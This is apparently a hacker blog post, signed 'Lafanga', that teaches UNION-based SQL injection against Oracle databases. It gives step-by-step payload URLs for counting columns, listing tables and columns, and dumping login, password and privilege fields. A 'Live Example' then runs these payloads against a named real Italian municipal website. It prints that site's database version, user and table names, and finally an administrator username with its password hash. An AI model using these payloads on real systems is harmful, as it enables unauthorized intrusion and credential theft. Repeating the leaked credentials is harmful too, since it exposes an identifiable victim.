Hello and welcome to a Oracle SQL injection tutorial. First you need to know that injecting into to Oracle databases is not much different then injecting into others. The only differences are the syntax and different filenames etc... Ok, if you know a site the is vulnerable to some sort of SQLi but, you don't know what database it is, try the following code to check for a Oracle DB.
Code:
https://somesite.com/calender.asp?day=7%20UNION%20SELECT%20NULL%
20from%20dual--
If it is a Oracle DB you should get a error like:
Code:
[Oracle][ODBC][Ora]ORA-01789: query block has incorrect number of result
columns
Now to find the amount of columns in the DB you will keep adding NULL data until you no longer receive and error.
Code:
https://somesite.com/calender.asp?day=7%20UNION%20SELECT%20NULL,NULL,NULL,NULL%
20from%20dual--
Now that you have the number of columns you can proceed to extract data from the DB. In this guide I will only show how to extract the account info but, other info can be extracted as well.
Now we try to find which column uses "string" data type. To do this we replace the first "NULL" with 'a'. If you receive an error replace the 'a' with Null and try the next "NULL". An example of this is:
Code:
https://somesite.com/calender.asp?day=7%20UNION%20SELECT%20NULL,'a','a',NULL%
20from%20dual--
Once you find the columns that use string data types you can start to search for the names of the tables containing useful info. To do this we use the "user_objects" table.We also use the "object_name" and "object_type" table names to show what the names and types of tables are that are specified as user data (Credentials). A example of the following would be like so:
Code:
https://somesite.com/calender.asp?day=7%20UNION%20SELECT%20NULL,
object_name,object_type,NULL%20from%20user_objects--
As you can see, we use the columns that use string data to show object_name and object_type.
Tip: You can also use the all_user_objects table instead of user_objects. This will show all info seen by the user even if the user does not owned it.
We should now see many different table names and types. If you don't, and you get and error, try removing NULL values and finding the columns that use string data type.
In my example lets just say we found a table called USERS. We will attempt to find the names of the column inside this table by using the user_tab_columns table like so:
Code:
https://somesite.com/calender.asp?day=7%20UNION%20SELECT%20NULL,
column_name,NULL,NULL%20from%20user_tab_columns%20where%20table_name%20%
3d%20Â’USERSÂ’--
Note: %3d is a URL encoded = and %20 is a URL encode whitespace (spacebar).
Now lets say we get login, password, and priviledge columns. We can query these by using the following code:
Code:
https://somesite.com/calender.asp?day=7%20UNION%20SELECT%20NULL,
login,password,priviledge%20from%20users--
You should get the login username, password, and priviledge level!
Tip: If there is only one column that uses string data type then you can concatenate multiple columns like so:
Code:
https://somesite.com/calender.asp?day=7%20UNION%20SELECT%20NULL,
login||Â’:Â’||password||Â’:Â’||priviledge,NULL,NULL%20from%20user_objects--
This is just like the concat command in MySQL.
Tip: If you want to perfect your oracle injection knowledge I recommend getting some e-books on oracle and installing oracle on your localhost. This way you can practice on your DB.
Live Example
PHP Code:http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122
Let's try order by
PHP Code:http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 order by 1
look under the picture shit stays like this
Sei in : Home -> Citta' -> Congressi
At order by 7 boom changes
PHP Code:http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122%20order%20by%207
Sei in : Home -> Citta' ->
Then no. of columns=6
Time to use union select
PHP Code:http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 union select null,null,null,null,null,null
LOLS...Vulnerable column isn't shown..
Let's try all columns
PHP Code:http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 union select banner,null,null,null,null,null from v$version
nothing shown wrong column
PHP Code:http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 union select null,banner,null,null,null,null from v$version
word congress shown again..This is the right column
VERSION
Code:http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,banner,NULL,NULL,NULL,NULL from v$version--
CORE 9.2.0.6.0 Production
CURRENT USER
Code:http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,user,NULL,NULL,NULL,NULL from dual--
WWWTARANTO
CURRENT DATABASE
Code:http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,SYS.DATABASE_NAME,NULL,NULL,NULL,NULL from DUAL--
CSTTA
Retrieving user created tables and columns from user_tab_columns. concat() works but takes only 2 parameters.
Code:http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from USER_TAB_COLUMNS--
54425F414C424F3A444154415F45534543555A494F4E45
convert this hex value to string.
TB_ALBO:DATA_ESECUZIONE
N.B:you can also use the following command
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from USER_TAB_COLUMNS--
To find the next column of table TB_ALBO
Code:http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from USER_TAB_COLUMNS where column_name> CHR(68) || CHR(65) || CHR(84) || CHR(65) || CHR(95) || CHR(69) || CHR(83) || CHR(69) || CHR(67) || CHR(85) || CHR(90) || CHR(73) || CHR(79) || CHR(78) || CHR(69)--
Code:CHR(68) || CHR(65) || CHR(84) || CHR(65) || CHR(95) || CHR(69) || CHR(83) || CHR(69) || CHR(67) || CHR(85) || CHR(90) || CHR(73) || CHR(79) || CHR(78) || CHR(69) = DATA_ESECUZIONE
54425F414C424F3A444154415F505542424C4943415A494F4E45TB_ALBO:DATA_PUBBLICAZIONE
using > all columns can be retrieved. If any error is generated or query jumps to some other table, then move on to the next table.
MOVING TO NEXT TABLE
Code:http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from USER_TAB_COLUMNS where table_name> CHR(84) || CHR(66) || CHR(95) || CHR(65) || CHR(76) || CHR(66) || CHR(79)--
54425F414C424F5F444F43554D454E544F3A4445534352495A494F4E45
TB_ALBO_DOCUMENTO:DESCRIZIONE
MOVING TO NEXT COLUMN OF TABLE TB_ALBO_DOCUMENTO
Code:http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from USER_TAB_COLUMNS where table_name> CHR(84) || CHR(66) || CHR(95) || CHR(65) || CHR(76) || CHR(66) || CHR(79) and column_name> CHR(68) || CHR(69) || CHR(83) || CHR(67) || CHR(82) || CHR(73) || CHR(90) || CHR(73) || CHR(79) || CHR(78) || CHR(69)--
54425F414C424F5F444F43554D454E544F3A4944
TB_ALBO_DOCUMENTO:ID
EXTRACTING DATA
Code:http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(LOGIN||chr(58)||PASSWORD),NULL,NULL,NULL,NULL from TB_UTENTE--
61646D696E6973747261746F723A3966323165646463363865663338373837666235656639313939316265613264
administrator:9f21eddc68ef38787fb5ef91991bea2d
AUTHOR: Lafanga
No comments:
Post a Comment